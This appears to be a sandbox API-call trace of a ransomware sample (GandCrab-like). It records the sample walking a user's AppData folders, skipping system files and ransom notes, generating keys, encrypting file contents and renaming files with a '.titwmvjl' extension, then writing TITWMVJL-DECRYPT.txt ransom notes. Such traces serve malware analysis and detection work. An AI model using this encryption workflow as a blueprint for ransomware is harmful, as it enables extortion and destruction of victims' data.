[0072.332] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.333] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0072.333] lstrcmpW (lpString1="Global.MPT", lpString2=".") returned 1 [0072.333] lstrcmpW (lpString1="Global.MPT", lpString2="..") returned 1 [0072.333] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\", lpString2="Global.MPT" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT" [0072.333] lstrlenW (lpString=".titwmvjl") returned 9 [0072.333] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT") returned 78 [0072.333] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.333] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT.titwmvjl") returned 87 [0072.333] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT") returned 78 [0072.333] lstrlenW (lpString=".MPT") returned 4 [0072.333] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.333] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".MPT ") returned 5 [0072.333] lstrcmpiW (lpString1=".MPT", lpString2=".titwmvjl") returned -1 [0072.333] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.334] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT") returned 78 [0072.334] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT") returned 78 [0072.334] lstrcmpiW (lpString1="Global.MPT", lpString2="desktop.ini") returned 1 [0072.334] lstrcmpiW (lpString1="Global.MPT", lpString2="autorun.inf") returned 1 [0072.334] lstrcmpiW (lpString1="Global.MPT", lpString2="ntuser.dat") returned -1 [0072.334] lstrcmpiW (lpString1="Global.MPT", lpString2="iconcache.db") returned -1 [0072.334] lstrcmpiW (lpString1="Global.MPT", lpString2="bootsect.bak") returned 1 [0072.334] lstrcmpiW (lpString1="Global.MPT", lpString2="boot.ini") returned 1 [0072.334] lstrcmpiW (lpString1="Global.MPT", lpString2="ntuser.dat.log") returned -1 [0072.334] lstrcmpiW (lpString1="Global.MPT", lpString2="thumbs.db") returned -1 [0072.334] lstrcmpiW (lpString1="Global.MPT", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0072.334] lstrcmpiW (lpString1="Global.MPT", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0072.334] lstrcmpiW (lpString1="Global.MPT", lpString2="KRAB-DECRYPT.html") returned -1 [0072.334] lstrcmpiW (lpString1="Global.MPT", lpString2="CRAB-DECRYPT.html") returned 1 [0072.334] lstrcmpiW (lpString1="Global.MPT", lpString2="KRAB-DECRYPT.txt") returned -1 [0072.334] lstrcmpiW (lpString1="Global.MPT", lpString2="CRAB-DECRYPT.txt") returned 1 [0072.334] lstrcmpiW (lpString1="Global.MPT", lpString2="ntldr") returned -1 [0072.334] lstrcmpiW (lpString1="Global.MPT", lpString2="NTDETECT.COM") returned -1 [0072.334] lstrcmpiW (lpString1="Global.MPT", lpString2="Bootfont.bin") returned 1 [0072.334] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT") returned 78 [0072.334] lstrlenW (lpString=".MPT") returned 4 [0072.334] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.334] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".MPT ") returned 5 [0072.335] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.335] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.335] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\ms project\\16\\en-us\\global.mpt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0072.336] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.336] ReadFile (in: hFile=0x2d4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0072.352] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.352] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.352] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0072.353] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0072.353] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0072.354] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0072.354] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0072.354] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.354] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.354] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.354] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.354] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0072.355] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0072.355] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0072.355] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0072.355] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0072.355] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.356] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.356] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.356] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.356] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0072.356] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.357] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5036f8) returned 1 [0072.357] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.357] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0072.358] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.358] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0072.358] GetLastError () returned 0x0 [0072.358] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.358] CryptDestroyKey (hKey=0x5036f8) returned 1 [0072.358] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.359] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.359] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.359] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0072.359] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.359] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503838) returned 1 [0072.360] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.360] CryptGetKeyParam (in: hKey=0x503838, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0072.360] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.360] CryptEncrypt (in: hKey=0x503838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0072.360] GetLastError () returned 0x0 [0072.360] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.361] CryptDestroyKey (hKey=0x503838) returned 1 [0072.361] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.361] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.361] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0072.361] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0072.361] ReadFile (in: hFile=0x2d4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259e78c*=0x100000, lpOverlapped=0x0) returned 1 [0072.403] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.403] WriteFile (in: hFile=0x2d4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259e770*=0x100000, lpOverlapped=0x0) returned 1 [0072.419] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.419] WriteFile (in: hFile=0x2d4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0072.421] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.425] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.428] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.429] CloseHandle (hObject=0x2d4) returned 1 [0072.444] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\ms project\\16\\en-us\\global.mpt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\Global.MPT.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\ms project\\16\\en-us\\global.mpt.titwmvjl"), dwFlags=0x1) returned 1 [0072.446] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.446] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0072.446] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.446] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.446] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\TITWMVJL-DECRYPT.txt" [0072.446] lstrlenW (lpString=".titwmvjl") returned 9 [0072.446] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\TITWMVJL-DECRYPT.txt") returned 88 [0072.446] VirtualAlloc (lpAddress=0x0, dwSize=0xf0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.447] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 97 [0072.447] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\TITWMVJL-DECRYPT.txt") returned 88 [0072.447] lstrlenW (lpString=".txt") returned 4 [0072.447] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.447] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.447] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.447] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.447] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\TITWMVJL-DECRYPT.txt") returned 88 [0072.447] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\TITWMVJL-DECRYPT.txt") returned 88 [0072.447] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.447] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.447] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.447] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.447] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.447] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.447] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.447] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.447] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.447] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 0 [0072.447] FindClose (in: hFindFile=0x5033b8 | out: hFindFile=0x5033b8) returned 1 [0072.449] CloseHandle (hObject=0x2cc) returned 1 [0072.449] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.449] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.449] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.449] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\TITWMVJL-DECRYPT.txt" [0072.449] lstrlenW (lpString=".titwmvjl") returned 9 [0072.449] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\TITWMVJL-DECRYPT.txt") returned 82 [0072.449] VirtualAlloc (lpAddress=0x0, dwSize=0xe4, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.449] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 91 [0072.449] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\TITWMVJL-DECRYPT.txt") returned 82 [0072.449] lstrlenW (lpString=".txt") returned 4 [0072.449] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.449] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.449] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.449] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.450] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\TITWMVJL-DECRYPT.txt") returned 82 [0072.450] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\TITWMVJL-DECRYPT.txt") returned 82 [0072.450] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.450] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.450] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.450] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.450] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.450] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.450] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.450] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.450] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.450] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0072.450] FindClose (in: hFindFile=0x503338 | out: hFindFile=0x503338) returned 1 [0072.451] CloseHandle (hObject=0x2c4) returned 1 [0072.451] FindNextFileW (in: hFindFile=0x503238, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.451] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.451] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.451] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\d2ca4a09d2ca4deb61a.lock" [0072.451] lstrlenW (lpString=".titwmvjl") returned 9 [0072.451] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\d2ca4a09d2ca4deb61a.lock") returned 83 [0072.451] VirtualAlloc (lpAddress=0x0, dwSize=0xe6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.451] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 92 [0072.451] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\d2ca4a09d2ca4deb61a.lock") returned 83 [0072.451] lstrlenW (lpString=".lock") returned 5 [0072.451] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.452] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.452] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.452] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.452] FindNextFileW (in: hFindFile=0x503238, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.452] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.452] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.452] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\TITWMVJL-DECRYPT.txt" [0072.452] lstrlenW (lpString=".titwmvjl") returned 9 [0072.452] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\TITWMVJL-DECRYPT.txt") returned 79 [0072.452] VirtualAlloc (lpAddress=0x0, dwSize=0xde, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.452] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 88 [0072.452] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\TITWMVJL-DECRYPT.txt") returned 79 [0072.452] lstrlenW (lpString=".txt") returned 4 [0072.452] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.453] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.453] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.453] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.453] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\TITWMVJL-DECRYPT.txt") returned 79 [0072.453] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\TITWMVJL-DECRYPT.txt") returned 79 [0072.453] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.453] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.453] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.453] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.453] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.453] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.453] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.453] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.453] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.453] FindNextFileW (in: hFindFile=0x503238, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0072.453] FindClose (in: hFindFile=0x503238 | out: hFindFile=0x503238) returned 1 [0072.454] CloseHandle (hObject=0x2bc) returned 1 [0072.454] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0072.454] lstrcmpW (lpString1="Network", lpString2=".") returned 1 [0072.454] lstrcmpW (lpString1="Network", lpString2="..") returned 1 [0072.454] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Network" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network" [0072.454] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\" [0072.454] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0072.454] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.454] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.455] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.455] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.455] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.455] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.455] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.455] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.455] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.455] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.455] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\\\TITWMVJL-DECRYPT.txt") returned 77 [0072.455] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\network\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc 